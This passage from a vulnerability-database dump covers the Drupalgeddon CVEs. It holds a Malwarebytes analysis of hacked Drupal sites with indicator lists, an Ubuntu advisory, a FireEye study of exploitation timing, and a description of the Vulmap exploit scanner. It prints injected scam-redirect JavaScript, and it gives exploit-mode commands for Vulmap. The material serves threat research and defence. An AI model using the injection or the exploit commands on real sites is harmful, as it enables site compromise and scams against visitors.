In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full backup and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number of web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. 
The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. 
But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went through the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer or Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. 
The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. 
We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. 
In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n 
dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2023-01-26T15:26:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * drupal7 \\- fully-featured content management framework\n\nIt was discovered that Drupal did not properly process certain input. An \nattacker could use this vulnerability to execute arbitrary code or \ncompletely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)\n\nIt was discovered that password reset URLs in Drupal could be forged. An \nattacker could use this vulnerability to gain access to another user's \naccount. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)\n\nIt was discovered that Drupal did not properly protect against open \nredirects. An attacker could use this vulnerability to send unsuspecting \nusers to 3rd party sites and potentially carry out phishing attacks. \nThis issue affected only Ubuntu 14.04 ESM. 
(CVE-2015-2749, CVE-2015-2750)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "ubuntu", "title": "Drupal vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2559", "CVE-2015-2749", "CVE-2015-2750", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2021-03-15T00:00:00", "id": "USN-4773-1", "href": "https://ubuntu.com/security/notices/USN-4773-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. 
Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 and Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\nFigure 2: Time between vulnerability exploitation and patch issuance\n\n_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. 
These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. 
The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. 
Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious 
actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. 
In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules. Using it in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment, may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. 
In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. 
-o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | 
S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution 